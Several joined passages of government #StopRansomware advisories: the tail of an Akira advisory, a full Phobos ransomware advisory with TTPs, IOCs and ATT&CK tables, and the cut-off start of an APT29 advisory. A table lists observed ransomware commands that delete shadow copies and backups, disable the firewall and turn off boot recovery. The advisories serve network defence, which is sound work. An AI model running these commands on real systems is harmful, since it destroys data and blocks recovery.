offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization helps ensure they will not be severely interrupted, and/or only have irretrievable data.  Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R]. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the FBI, CISA, EC3, and NCSC-NL recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, EC3 and NCSC-NL recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Tables 6 -14). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The FBI, CISA, EC3, and NCSC-NL recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts. Resource to mitigate a ransomware attack: #StopRansomware Guide. No cost cyber hygiene services: Cyber Hygiene Services, Ransomware Readiness Assessment. REFERENCES Fortinet: Ransomware Roundup – Akira Cisco: Akira Ransomware Targeting VPNs without MFA Truesec: Indications of Akira Ransomware Group Actively Exploiting Cisco AnyConnect CVE-2020-3259 TrendMicro: Akira Ransomware Spotlight CrowdStrike: What is a Kerberoasting Attack? Sophos: Akira, again: The ransomware that keeps on taking Sophos: Akira Ransomware is “bringin’ 1988 back” REPORTING Your organization has no obligation to respond or provide information back to the FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws. The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Akira threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators. The FBI, CISA, EC3, and NCSC-NL do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or by calling 1-844-Say-CISA (1-844-729-2472). DISCLAIMER The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, EC3, and NCSC-NL do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI or CISA. ACKNOWLEDGEMENTS Cisco, Sophos, and Fortinet contributed to this advisory. VERSION HISTORY April 18, 2024: Initial version.

SUMMARY Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars.[1],[2] The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Phobos ransomware and other ransomware incidents. Download the PDF version of this report: AA24-060A #StopRansomware: Phobos Ransomware (PDF, 678.84 KB ) For a downloadable copy of indicators of compromise (IOCs), see: AA24-060A STIX XML (XML, 147.73 KB ) AA24-060A STIX JSON (JSON, 119.53 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Overview According to open source reporting, Phobos ransomware is likely connected to numerous variants (including Elking, Eight, Devos, Backmydata, and Faust ransomware) due to similar TTPs observed in Phobos intrusions. Phobos ransomware operates in conjunction with various open source tools such as Smokeloader, Cobalt Strike, and Bloodhound. These tools are all widely accessible and easy to use in various operating environments, making it (and associated variants) a popular choice for many threat actors.[3],[4] Reconnaissance and Initial Access Phobos actors typically gain initial access to vulnerable networks by leveraging phishing campaigns [T1598] to drop hidden payloads or using internet protocol (IP) scanning tools, such as Angry IP Scanner, to search for vulnerable Remote Desktop Protocol (RDP) ports [T1595.001] or by leveraging RDP on Microsoft Windows environments.[5],[6] Once they discover an exposed RDP service, the actors use open source brute force tools to gain access [T1110]. If Phobos actors gain successful RDP authentication [T1133][T1078] in the targeted environment, they perform open source research to create a victim profile and connect the targeted IP addresses to their associated companies [T1593]. Threat actors leveraging Phobos have notably deployed remote access tools to establish a remote connection within the compromised network [T1219].[7] Alternatively, threat actors send spoofed email attachments [T1566.001] that are embedded with hidden payloads [T1204.002] such as SmokeLoader, a backdoor trojan that is often used in conjunction with Phobos. After SmokeLoader’s hidden payload is downloaded onto the victim’s system, threat actors use the malware’s functionality to download the Phobos payload and exfiltrate data from the compromised system. Execution and Privilege Escalation Phobos actors run executables like 1saas.exe or cmd.exe to deploy additional Phobos payloads that have elevated privileges enabled [TA0004]. Additionally, Phobos actors can use the previous commands to perform various windows shell functions. The Windows command shell enables threat actors to control various aspects of a system, with multiple permission levels required for different subsets of commands [T1059.003][T1105].[8] Smokeloader Deployment Phobos operations feature a standard three phase process to decrypt a payload that allows the threat actors to deploy additional destructive malware.[9] For the first phase, Smokeloader manipulates either VirtualAlloc or VirtualProtect API functions—which opens an entry point, enabling code to be injected into running processes and allowing the malware to evade network defense tools [T1055.002]. In the second phase, a stealth process is used to obfuscate command and control (C2) activity by producing requests to legitimate websites [T1001.003].[10] Within this phase, the shellcode also sends a call from the entry point to a memory container [T1055.004] and prepares a portable executable for deployment in the final stage [T1027.002][T1105][T1140]. Finally, once Smokeloader reaches its third stage, it unpacks a program-erase cycle from stored memory, which is then sent to be extracted from a SHA 256 hash as a payload.[7] Following successful payload decryption, the threat actors can begin downloading additional malware. Additional Phobos Defense Evasion Capabilities Phobos ransomware actors have been observed bypassing organizational network defense protocols by modifying system firewall configurations using commands like netsh firewall set opmode mode=disable [T1562.004]. Additionally, Phobos actors can evade detection by using the following tools: Universal Virus Sniffer, Process Hacker, and PowerTool [T1562]. Persistence and Privilege Escalation According to open source reporting, Phobos ransomware uses commands such as Exec.exe or the bcdedit[.]exe control mechanism. Phobos has also been observed using Windows Startup folders and Run Registry Keys such as C:/Users\Admin\AppData\Local\directory [T1490][T1547.001] to maintain persistence within compromised environments.[5] Additionally, Phobos actors have been observed using built-in Windows API functions [T1106] to steal tokens [T1134.001], bypass access controls, and create new processes to escalate privileges by leveraging the SeDebugPrivilege process [T1134.002]. Phobos actors attempt to authenticate using cached password hashes on victim machines until they reach domain administrator access [T1003.005]. Discovery and Credential Access Phobos actors additionally use open source tools [T1588.002] such as Bloodhound and Sharphound to enumerate the active directory [T1087.002]. Mimikatz and NirSoft, as well as Remote Desktop Passview to export browser client credentials [T1003.001][T1555.003], have also been used. Furthermore, Phobos ransomware is able to enumerate connected storage devices [T1082], running processes [T1057], and encrypt user files [T1083]. Exfiltration Phobos actors have been observed using WinSCP and Mega.io for file exfiltration.[11] They use WinSCP to connect directly from a victim network to an FTP server [T1071.002] they control [TA0010]. Phobos actors install Mega.io [T1048] and use it to export victim files directly to a cloud storage provider [T1567.002]. Data is typically archived as either a .rar or .zip file [T1560] to be later exfiltrated. They target legal documentation, financial records, technical documents (including network architecture), and databases for commonly used password management software [T1555.005]. Impact After the exfiltration phase, Phobos actors then hunt for backups. They use vssadmin.exe and Windows Management Instrumentation command-line utility (WMIC) to discover and delete volume shadow copies in Windows environments. This prevents victims from recovering files after encryption has taken place [T1047][T1490]. Phobos.exe contains functionality to encrypt all connected logical drives on the target host [T1486]. Each Phobos ransomware executable has unique build identifiers (IDs), affiliate IDs, as well as a unique ransom note which is embedded in the executable. After the ransom note has populated on infected workstations, Phobos ransomware continues to search for and encrypt additional files. Most extortion [T1657] occurs via email; however, some affiliate groups have used voice calls to contact victims. In some cases, Phobos actors have used onion sites to list victims and host stolen victim data. Phobos actors use various instant messaging applications such as ICQ, Jabber, and QQ to communicate [T1585]. See Figure 2 for a list of email providers used by the following Phobos affiliates: Devos, Eight, Elbie, Eking, and Faust.[6] Figure 1: Phobos Affiliate Providers List INDICATORS OF COMPROMISE (IOCs) See Table 1 through 6 for IOCs obtained from CISA and the FBI investigations from September through November 2023. Table 1: Associated Phobos Domains Associated Phobos Domains adstat477d[.]xyz demstat577d[.]xyz [12] serverxlogs21[.]xyz Table 2: Observed Phobos Shell Commands Shell Commands vssadmin delete shadows /all /quiet [T1490] netsh advfirewall set currentprofile state off wmic shadowcopy delete netsh firewall set opmode mode=disable [T1562.004] bcdedit /set {default} bootstatuspolicy ignoreallfailures [T1547.001] bcdedit /set {default} recoveryenabled no [T1490] wbadmin delete catalog -quiet mshta C:\%USERPROFILE%\Desktop\info.hta [T1218.005] mshta C:\%PUBLIC%\Desktop\info.hta mshta C:\info.hta The commands above are observed during the execution of a Phobos encryption executable. A Phobos encryption executable spawns a cmd.exe process, which then executes the commands listed in Table 1 with their respective Windows system executables. When the commands above are executed on a Windows system, volume shadow copies are deleted and Windows Firewall is disabled. Additionally, the system’s boot status policy is set to boot even when there are errors during the boot process, and automatic recovery options, like Windows Recovery Environment (WinRE), are disabled for the given boot entry. The system’s backup catalog is also deleted. Finally, the Phobos ransom note is displayed to the end user using mshta.exe. Table 3: Observed Phobos Registry Keys Registry Keys HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<Phobos exe name> C:/Users\Admin\AppData\Local\directory Table 4: Observed Phobos Actor Email Addresses Email Addresses   AlbetPattisson1981@protonmail[.]com henryk@onionmail[.]org atomicday@tuta[.]io info@fobos[.]one axdus@tuta[.]io it.issues.solving@outlook[.]com barenuckles@tutanota[.]com JohnWilliams1887@gmx[.]com Bernard.bunyan@aol[.]com jonson_eight@gmx[.]us bill.g@gmx[.]com joshuabernandead@gmx[.]com bill.g@msgsafe[.]io LettoIntago@onionmail[.]com bill.g@onionmail[.]org Luiza.li@tutanota[.]com bill.gTeam@gmx[.]com MatheusCosta0194@gmx[.]com blair_lockyer@aol[.]com mccreight.ellery@tutanota[.]com CarlJohnson1948@gmx[.]com megaport@tuta[.]io cashonlycash@gmx[.]com miadowson@tuta[.]io chocolate_muffin@tutanota[.]com MichaelWayne1973@tutanota[.]com claredrinkall@aol[.]com normanbaker1929@gmx[.]com clausmeyer070@cock[.]li nud_satanakia@keemail[.]me colexpro@keemail[.]me please@countermail[.]com cox.barthel@aol[.]com precorpman@onionmail[.]org crashonlycash@gmx[.]com recovery2021@inboxhub[.]net everymoment@tuta[.]io recovery2021@onionmail[.]org expertbox@tuta[.]io SamuelWhite1821@tutanota[.]com fastway@tuta[.]io SaraConor@gmx[.]com fquatela@techie[.]com secdatltd@gmx[.]com fredmoneco@tutanota[.]com skymix@tuta[.]io getdata@gmx[.]com sory@countermail[.]com greenbookBTC@gmx[.]com spacegroup@tuta[.]io greenbookBTC@protonmail[.]com stafordpalin@protonmail[.]com helperfiles@gmx[.]com starcomp@keemail[.]me helpermail@onionmail[.]org xdone@tutamail[.]com helpfiles@onionmail[.]org xgen@tuta[.]io helpfiles102030@inboxhub[.]net xspacegroup@protonmail[.]com helpforyou@gmx[.]com zgen@tuta[.]io helpforyou@onionmail[.]org zodiacx@tuta[.]io Table 5: Observed Phobos Actor Telegram Username Telegram Username @phobos_support Table 6: Observed Phobos Actor Wickr Address Wickr Address Vickre me Disclaimer: Organizations are encouraged to investigate the use of the IOCs in Table 7 for related signs of compromise prior to performing remediation actions. Table 7: Phobos IOCs from September through December 2023 Associated IP Address File Type File Name SHA 256 Hash 194.165.16[.]4 (October 2023) Win32.exe Ahpdate.exe [13] 0000599cbc6e5b0633c5a6261c79e4d3d81005c77845c6b0679d854884a8e02f 45.9.74[.]14 (December 2023) 147.78.47[.]224 (December 2023) Executable and Linkable Format (ELF) [14] 1570442295 (Trojan Linux Mirai) 7451be9b65b956ee667081e1141531514b1ec348e7081b5a9cd1308a98eec8f0 185.202.0[.]111 (September 2023) Win32.exe [15] cobaltstrike_shellcode[.]exe (C2 activity)   185.202.0[.]111 (December 2023) .txt [16] f1425cff3d28afe5245459afa6d7985081bc6a62f86dce64c63daeb2136d7d2c.bin (Trojan)   Disclaimer: Organizations are encouraged to investigate the use of the file hashes in Tables 8 and 9 for related signs of compromise prior to performing remediation actions. Table 8: Phobos Actor File Hashes Observed in October 2023 Phobos Ransomware SHA 256 Malicious Trojan Executable File Hashes 518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c 9215550ce3b164972413a329ab697012e909d543e8ac05d9901095016dd3fc6c 482754d66d01aa3579f007c2b3c3d0591865eb60ba60b9c28c66fe6f4ac53c52 c0539fd02ca0184925a932a9e926c681dc9c81b5de4624250f2dd885ca5c4763 Table 9: Phobos Actor File Hashes from Open Source from November 2023 [17] Phobos Ransomware SHA 256 File Hashes 58626a9bfb48cd30acd0d95debcaefd188ae794e1e0072c5bde8adae9bccafa6 f3be35f8b8301e39dd3dffc9325553516a085c12dc15494a5e2fce73c77069ed 518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c 32a674b59c3f9a45efde48368b4de7e0e76c19e06b2f18afb6638d1a080b2eb3 2704e269fb5cf9a02070a0ea07d82dc9d87f2cb95e60cb71d6c6d38b01869f66 fc4b14250db7f66107820ecc56026e6be3e8e0eb2d428719156cf1c53ae139c6 a91491f45b851a07f91ba5a200967921bf796d38677786de51a4a8fe5ddeafd2 MITRE ATT&CK TECHNIQUES See Table 10 through 22 for all threat actor tactics and techniques referenced in this advisory. Table 10: Phobos Threat Actors ATT&CK Techniques for Enterprise – Reconnaissance Technique Title ID Use Search Open Websites/Domains T1593 Phobos actors perform open source research to find information about victims that can be used during targeting to create a victim profile. Scanning IP Blocks T1595.001 Phobos actors used IP scanning tools to include Angry IP Scanner to search for vulnerable RDP ports. Phishing for Information T1598 Phobos actors use phishing campaigns to social engineer information from users and gain access to vulnerable RDP ports. Table 11: Phobos Threat Actors ATT&CK Techniques for Enterprise – Resource Development Technique Title ID Use Establish Accounts T1585 Phobos actors establish accounts to communicate. Obtain Capabilities: Tool T1588.002 Phobos actors used open source tools in their attack. Table 12: Phobos Threat Actors ATT&CK Techniques for Enterprise – Initial Access Technique Title ID Use Valid Accounts T1078 Following successful RDP authentication, Phobos actors search for IP addresses and pair them with their associated computer to create a victim profile. External Remote Services T1133 Phobos actors may leverage external-facing remote services to initially access and/or persist within a network. Phishing: Spearphishing Attachment T1566.001 Phobos actors used a spoofed email attachment to execute attack. Table 13: Phobos Threat Actors ATT&CK Techniques for Enterprise – Execution Technique Title ID Use Windows Management Instrumentation T1047 Phobos actors used Windows Management Instrumentation command-line utility (WMIC) to prevent victims from recovering files. Windows Command Shell T1059.003 Phobos actors can use the previous commands to perform commands with windows shell functions. Native API T1106 Phobos actors used open source tools to enumerate the active directory. Malicious File T1204.002 Phobos actors attached a malicious email attachment to deliver ransomware. Table 14: Phobos Threat Actors ATT&CK Techniques for Enterprise – Persistence Technique Title ID Use Registry Run Keys / Startup Folder T1547.001 Phobos ransomware operates using the Exec.exe control mechanism and has been observed using Windows Startup folders and Run Registry Keys. Table 15: Phobos Threat Actors ATT&CK Techniques for Enterprise – Privilege Escalation Technique Title ID Use Privilege Escalation TA0004 Phobos actors use run commands like 1saas.exe, or cmd.exe to deploy additional Phobos payloads with escalated privileges. Portable Executable Injection T1055.002 Phobos actors use Smokeloader to inject code into running processes to identify an entry point through enabling a VirtualAlloc or VirtualProtect process. Asynchronous Procedure Call T1055.004 During phase two of execution, Phobos ransomware sends a call back from an identified entry point. Access Token Manipulation: Token Impersonation/Theft T1134.001 Phobos actors can use Windows API functions to steal tokens. Create Process with Token T1134.002 Phobos actors used Windows API functions to steal tokens, bypass access controls and create new processes. Table 16: Phobos Threat Actors ATT&CK Techniques for Enterprise – Defense Evasion Technique Title ID Use Software Packing T1027.002 Phobos actors deployed a portable executable (PE) to conceal code. Embedded Payloads T1027.009 Phobos actors embedded the ransomware as a hidden payload by using Smokeloader. Deobfuscate/Decode Files or Information T1140 During phase two of execution, Phobos actors’ malware stores and decrypts information. System Binary Proxy Execution: Mshta T1218.005 Phobos actors used Mshta to execute malicious files. Impair Defenses T1562 Phobos actors can use Universal Virus Sniffer, Process Hacker, and PowerTool to evade detection. Disable or Modify System Firewall T1562.004 Phobos ransomware has been observed bypassing organizational network defense protocols through modifying system firewall configurations. Table 17: Phobos Threat Actors ATT&CK Techniques for Enterprise – Credential Access Technique Title ID Use OS Credential Dumping: LSASS Memory T1003.001 Phobos actors used Mimikatz to export credentials. OS Credential Dumping: Cached Domain Credentials T1003.005 Phobos actors use cached domain credentials to authenticate as the domain administrator in the event a domain controller is unavailable. Brute Force T1110 Phobos actors may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Credentials from Password Stores T1555 Phobos actors may search for common password storage locations to obtain user credentials. Credentials from Password Stores: Credentials from Web Browsers T1555.003 Phobos actors use Nirsoft or Passview to export client credentials from web browsers. Phobos actors search for stored credentials in browser clients once they gain initial network access. Credentials from Password Stores: Password Managers T1555.005 Phobos actors targeted victim’s databases for password management software. Table 18: Phobos Threat Actors ATT&CK Techniques for Enterprise – Discovery Technique Title ID Use Process Discovery T1057 Phobos ransomware is able to run processes. System Information Discovery T1082 Phobos ransomware is able to enumerate connected storage devices. File and Directory Discovery T1083 Phobos ransomware can encrypt user files. Domain Account T1087.002 Phobos threat actor used Bloodhound and Sharphound to enumerate the active directory. Table 19: Phobos Threat Actors ATT&CK Techniques for Enterprise – Collection Technique Title ID Use Archive Collected Data T1560 Phobos threat actors archive data as either a .rar or .zip file to be later exfiltrated. Table 20: Phobos Threat Actors ATT&CK Techniques for Enterprise – Command and Control Technique Title ID Use Data Obfuscation: Protocol Impersonation T1001.003 Phobos actors used a stealth process to obfuscate C2 activity. File Transfer Protocols T1071.002 Phobos threat actors used WinSCP to connect the victim’s network to an FTP server. Ingress Tool Transfer T1105 Phobos ransomware extracts its final payload from the hashed file. Remote Access Software T1219 Phobos threat actors used remote access tools to establish a remote connection within victim’s network. Table 21: Phobos Threat Actors ATT&CK Techniques for Enterprise – Exfiltration Technique Title ID Use Exfiltration TA0010 Phobos threat actors may use exfiltration techniques to steal data from your network. Exfiltration Over Alternative Protocol T1048 Phobos threat actors use software to export files to a cloud. Exfiltration to Cloud Storage T1567.002 Phobos threat actors use Mega.io to exfiltrate data to a cloud storage service rather than over their primary command and control channel. Table 22: Phobos Threat Actors ATT&CK Techniques for Enterprise – Impact Technique Title ID Use Data Encrypted for Impact T1486 Phobos threat actors use the Phobos.exe command to encrypt data on all logical drives connected to the network. Inhibit System Recovery T1490 Phobos threat actors may delete or remove backups to include volume shadow copies from Windows environments to prevent victim data recovery response efforts. Financial Theft T1657 Phobos threat actor’s extort victims for financial gain. MITIGATIONS Secure by Design and Default Mitigations: These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the secure posture for their customers. For more information on secure by design, see CISA’s Secure by Design webpage and joint guide. The FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture against actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Secure remote access software by applying recommendations from the joint Guide to Securing Remote Access Software. Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlist solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Implement log collection best practices and use intrusion detection systems to defend against threat actors manipulating firewall configurations through early detection [CPG 2.T]. Implement EDR solutions to disrupt threat actor memory allocation techniques. Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]: Audit the network for systems using RDP. Close unused RDP ports. Enforce account lockouts after a specified number of attempts. Apply phishing-resistant multifactor authentication (MFA). Log RDP login attempts. Disable command-line and scripting activities and permissions [CPG 2.N]. Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C]. Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E]. Reduce the threat of credential compromise via the following: Place domain admin accounts in the protected users’ group to prevent caching of password hashes locally. Refrain from storing plaintext credentials in scripts. Implement time-based access for accounts at the admin level and higher [CPG 2.A, 2.E]. In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud). Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R]. Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies. Use longer passwords consisting of at least 15 characters and no more than 64 characters in length [CPG 2.B]. Store passwords in hashed format using industry-recognized password managers. Add password user “salts” to shared login credentials. Avoid reusing passwords [CPG 2.C]. Implement multiple failed login attempt account lockouts [CPG 2.G]. Disable password “hints.” Refrain from requiring password changes more frequently than once per year.Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher. Require administrator credentials to install software. Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H]. Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F]. Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A]. Install, regularly update, and enable real time detection for antivirus software on all hosts. Disable unused ports and protocols [CPG 2.V]. Consider adding an email banner to emails received from outside your organization [CPG 2.M]. Disable hyperlinks in received emails. Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R]. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Tables 4-16). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts. Resource to mitigate a ransomware attack: CISA, NSA, FBI, and Multi-State Information Sharing and Analysis Center’s (MS-ISAC) Joint #StopRansomware Guide. SLTT organizations are encouraged to implement MS-ISAC’s Ransomware Defense-in-Depth guidance. No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment. CISA: Known Exploited Vulnerabilities Catalog CISA, MITRE: Best Practices for MITRE ATT&CK Mapping CISA: Decider Tool CISA: Cross-Sector Cybersecurity Performance Goals CISA: Secure by Design CISA: Implementing Phishing-Resistant MFA CISA: Guide to Securing Remote Access Software REFERENCES [1] Privacy Affairs: “Moral” 8Base Ransomware Targets 2 New Victims[2] VMware: 8base ransomware: A Heavy Hitting Player[3] Infosecurity Magazine: Phobos Ransomware Family Expands With New FAUST Variant[4] The Record: Hospitals offline across Romania following ransomware attack on IT platform[5] Comparitech: What is Phobos Ransomware & How to Protect Against It?[6] Cisco Talos: Understanding the Phobos affiliate structure and activity[7] Cisco Talos: A deep dive into Phobos ransomware, recently deployed by 8Base group[8] Malwarebytes Labs: A deep dive into Phobos ransomware[9] Any Run: Smokeloader[10] Malpedia: Smokeloader[11] Truesec: A case of the FAUST Ransomware[12] VirusTotal: Phobos Domain #1[13] VirusTotal: Phobos executable: Ahpdate.exe[14] VirusTotal: Phobos GUI extension: ELF File[15] VirusTotal: Phobos IP address: 185.202.0[.]111[16] VirusTotal: Phobos GUI extension: Binary File[17] Cisco Talos GitHub: IOCs/2023/11/deep-dive-into-phobos-ransomware.txt at main REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom-note, communications with Phobos actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA at report@cisa.gov or by calling 1-844-Say-CISA (1-844-729-2472). DISCLAIMER The FBI does not conduct its investigative activities or base attribution solely on activities protected by the First Amendment. Your company has no obligation to respond or provide information back to the FBI in response to this engagement. If, after reviewing the information, your company decides to provide referral information to the FBI, it must do so in a manner consistent with federal law. The FBI does not request or expect your company to take any particular action regarding this information other than holding it in confidence due to its sensitive nature. The information in this report is being provided “as is” for informational purposes only. The FBI and CISA not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, and the MS-ISAC. ACKNOWLEDGEMENTS The California Joint Regional Intelligence Center (JRIC, CA) and Israel National Cyber Directorate (INCD) contributed to this CSA. VERSION HISTORY February 29, 2024: Initial version.

How SVR-Attributed Actors are Adapting to the Move of Government and Corporations to Cloud Infrastructure OVERVIEW This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear. The UK National Cyber Security Centre (NCSC) and international partners assess that APT29 is a cyber espionage group, almost certainly part of the SVR, an element of the Russian intelligence services. The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and New Zealand Government Communications Security Bureau (GCSB) agree with this attribution and the details provided in this advisory. This advisory provides an overview of TTPs deployed by the actor to gain initial access into the cloud environment and includes advice to detect and mitigate this activity. To download the PDF version of this report, click here. PREVIOUS ACTOR ACTIVITY The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain. It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations. SVR actors are also known for: The supply chain compromise of SolarWinds software. Activity that targeted organizations developing the COVID-19 vaccine. EVOLVING TTPs As organizations continue to modernize their systems and move to cloud-based infrastructure, the SVR has adapted to these changes in the operating environment. They have to move beyond their traditional means of initial access, such as exploiting software vulnerabilities in an on-premises network, and instead target the cloud services themselves. To access the majority of the victims’ cloud hosted network, actors must first successfully authenticate to the cloud provider. Denying initial access to the cloud environment can prohibit SVR from successfully compromising their target. In contrast, in an on-premises system, more of the network is typically exposed to threat actors. Below describes in more detail how SVR actors are adapting to continue their cyber operations for intelligence gain. These TTPs have been observed in the last 12 months. ACCESS VIA SERVICE AND DORMANT ACCOUNTS Previous SVR campaigns reveal the actors have successfully used brute forcing [T1110] and password spraying to access service accounts. This type of account is typically used to run and manage applications and services. There is no human user behind them so they cannot be easily protected with multi-factor authentication (MFA), making these accounts more susceptible to a successful compromise. Service accounts are often also highly privileged depending on which applications and services they’re responsible for managing. Gaining access to these accounts provides threat actors with privileged 